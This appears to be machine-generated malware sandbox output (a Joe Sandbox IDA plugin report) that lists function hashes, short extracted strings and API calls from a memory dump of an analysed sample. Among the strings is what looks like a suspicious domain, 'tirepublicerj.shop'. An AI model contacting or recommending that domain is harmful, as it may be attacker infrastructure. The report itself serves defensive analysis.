                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                        • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                                        • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                        • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                        • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                                        • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                        • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                        • Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
                                                        • Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                        • Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: S"(w$S"(w$f
                                                        • API String ID: 2994545307-891790955
                                                        • Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                        • Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
                                                        • Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                        • Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                        • Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
                                                        • Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                        • Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A0CAAC5595236522822D1F4978021086$tirepublicerj.shop$yD
                                                        • API String ID: 0-3029881286
                                                        • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                        • Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
                                                        • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                        • Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -jkhanold~m`$anold~m`$d~m`
                                                        • API String ID: 0-185452761
                                                        • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                        • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                                        • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                        • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                        • Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
                                                        • Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                        • Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8deZ$<`>f$567
                                                        • API String ID: 0-937435233
                                                        • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                        • Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
                                                        • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                        • Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ut$.^Nw$QRP,
                                                        • API String ID: 0-2489489831
                                                        • Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                        • Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
                                                        • Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                        • Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $:$K
                                                        • API String ID: 0-296352136
                                                        • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                        • Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
                                                        • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                        • Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$8
                                                        • API String ID: 0-46163386
                                                        • Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                        • Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
                                                        • Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                        • Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /B$nB
                                                        • API String ID: 0-3787476056
                                                        • Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                        • Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
                                                        • Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                        • Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID:
                                                        • API String ID: 237503144-0
                                                        • Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                        • Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
                                                        • Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                        • Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !'$27
                                                        • API String ID: 0-1982139352
                                                        • Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                        • Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
                                                        • Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                        • Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: >D$UUK
                                                        • API String ID: 0-1347512165
                                                        • Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                        • Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
                                                        • Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                        • Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ji46$rYaT
                                                        • API String ID: 0-3893754386
                                                        • Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                        • Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
                                                        • Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                        • Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: =$^\
                                                        • API String ID: 0-3808277151
                                                        • Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                        • Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
                                                        • Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                        • Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$H
                                                        • API String ID: 0-1447585844
                                                        • Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                        • Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
                                                        • Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                        • Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$H
                                                        • API String ID: 0-1447585844
                                                        • Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                        • Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
                                                        • Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                        • Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$H
                                                        • API String ID: 0-1447585844
                                                        • Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                        • Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
                                                        • Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                        • Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: n$n
                                                        • API String ID: 0-3874132673
                                                        • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                        • Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
                                                        • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                        • Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 7$gfff
                                                        • API String ID: 0-3777064726
                                                        • Opcode ID: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                        • Instruction ID: 4941e5eadb7aba571cda7473ebd939308df881bd2ae5f083bfc9904c5215119c
                                                        • Opcode Fuzzy Hash: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                        • Instruction Fuzzy Hash: 7061F572A446118FE714CF29DC017ABB7E2EBC5314F09C62EE485DB392EB3898458B85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 7{B$hxB
                                                        • API String ID: 0-2782839610
                                                        • Opcode ID: 969304de8e2ff430d6fed9e82d3ec5cb1b50224069e0a7491f59bb6e4dd82972
                                                        • Instruction ID: 1d0bc7c47f9e9f486bda4e769dd1419a7faa478ba188ee17b6b14aa8c80eb475
                                                        • Opcode Fuzzy Hash: 969304de8e2ff430d6fed9e82d3ec5cb1b50224069e0a7491f59bb6e4dd82972
                                                        • Instruction Fuzzy Hash: 7F613672B5C3A28BD7348F2894513ABB7E1EF56350F84893ED4D987381E2389905D39B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XY
                                                        • API String ID: 0-554446067
                                                        • Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                        • Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
                                                        • Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                        • Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: q
                                                        • API String ID: 0-3900047139
                                                        • Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                        • Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
                                                        • Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                        • Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6
                                                        • API String ID: 0-498629140
                                                        • Opcode ID: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                        • Instruction ID: 787a559d3a6ca89598d2bb367016cd154da02af78fea546a06432564028693a7
                                                        • Opcode Fuzzy Hash: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                        • Instruction Fuzzy Hash: C3322CB0405B819FD351DF39C545793BFE0AB16214F188A9EE4E9CB383D236E146CBA6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                        • Instruction ID: 5d6f820f76e102683b6000eea9d9c0854d2a53b51ca8dd83b48920ec6b395174
                                                        • Opcode Fuzzy Hash: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                        • Instruction Fuzzy Hash: 096111716083548FE720CF65D841BEFB7F0FB8A308F10856CE558AB282DB7554068B8A
                                                        Strings
                                                        • 0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0044767D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                        • API String ID: 0-2906481384
                                                        • Opcode ID: 9e22ed48fff3af2e7b76bfd00b4154be574e43066c795e0929cb0518ae780158
                                                        • Instruction ID: 6414a5c7af84df5e815f882be76ef624ada3128550bd581c9538c389b961a46b
                                                        • Opcode Fuzzy Hash: 9e22ed48fff3af2e7b76bfd00b4154be574e43066c795e0929cb0518ae780158
                                                        • Instruction Fuzzy Hash: D4D192B54693D5AFDB968F3084912A37FB1EF4B71935661EEC9C38E423C2219443DB82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NP,?
                                                        • API String ID: 0-3110377521
                                                        • Opcode ID: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                        • Instruction ID: 1f4fb5fde5d3a5e7269753d163d491fe37fce05cbc84d157e3c3b696b68cf536
                                                        • Opcode Fuzzy Hash: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                        • Instruction Fuzzy Hash: 4CA148316052009BD714CF16CC81B6BB3A6FBC9314F14962DE9A5573C1D779AC06CB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "PA
                                                        • API String ID: 0-2145937358
                                                        • Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                        • Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
                                                        • Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                        • Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                        • Instruction ID: 911296d1392f8c3c8cd6404ab6709485da162d277dd93cabcee5ac66b0687773
                                                        • Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                        • Instruction Fuzzy Hash: 39A14B72E087618BC7109E28C98035BBBE1AB81310F698A7EDDD4B73D5DB389C458BC5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: <
                                                        • API String ID: 0-4251816714
                                                        • Opcode ID: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                        • Instruction ID: 298ed6161c937c0e6968453eb829229e96a7e3621a1d6b118fdfa9d8e411f9a2
                                                        • Opcode Fuzzy Hash: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                        • Instruction Fuzzy Hash: 78D1B0216087C28ED726CB3C8844359BF91AB67224F0983D9D0E95F3D3C3698986C7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x(m.
                                                        • API String ID: 0-3038009362
                                                        • Opcode ID: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                        • Instruction ID: 8fe95d6803831fae5c575aca5061d2950839e556567635e7946eadf65fb6b687
                                                        • Opcode Fuzzy Hash: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                        • Instruction Fuzzy Hash: F27128B2A083108BD3248F25C4D03A7B7E1EFDA314F19595DE8C66B391E7788945C7D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,
                                                        • API String ID: 0-3772416878
